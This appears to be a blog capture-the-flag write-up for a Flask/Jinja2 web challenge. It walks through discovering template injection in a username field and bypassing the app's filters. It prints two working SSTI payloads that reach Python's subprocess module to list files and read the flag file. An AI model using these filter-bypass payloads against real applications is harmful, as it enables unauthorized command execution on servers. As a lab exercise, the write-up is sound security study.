Congenial Octo Couscous

Web [70 pts]

At first glance, we don’t see anything suspicious in our page or page source. Trying to access the endpoint /strategyguide.txt will return: ACCESS DENIED.

After messing around with the input, I did see that the username field is the one displaying our results. So I started experimenting with SSTI tests.

Trying this payload returns a bunch of information about the server. Exposing the backend technology (Jinja2/Flask) as well as the source code for this challenge.

Step 1

We look at the endpoint /secretserverfile.py and find this:

Making it more readable in a text editor:

Step 2

We see that there is a bunch of filters for SSTI, preventing various system commands and code execution.

After looking online at multiple ways to bypass this:

Resource: Jinja2 template injection filter bypasses

Resource: SSTI Jinja2 payloads
We came up with a payload to bypass these filters and to call subprocess to see if we can get information from the file directory:
{{request|attr(‘application’)|attr(‘__globals__’)|attr(‘__getitem__’)(‘__builtins__’)|attr(‘__getitem__’)(‘__import__’)(‘subprocess’)|attr(‘getoutput’)(‘ls’)}}

Step 3

Using the above payload will result in this:

Now since we can run commands, we cat the text file for strategyguide.txt, giving us our flag:
{{request|attr(‘application’)|attr(‘__globals__’)|attr(‘__getitem__’)(‘__builtins__’)|attr(‘__getitem__’)(‘__import__’)(‘subprocess’)|attr(‘getoutput’)(‘cat strategyguide.txt’)}}

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s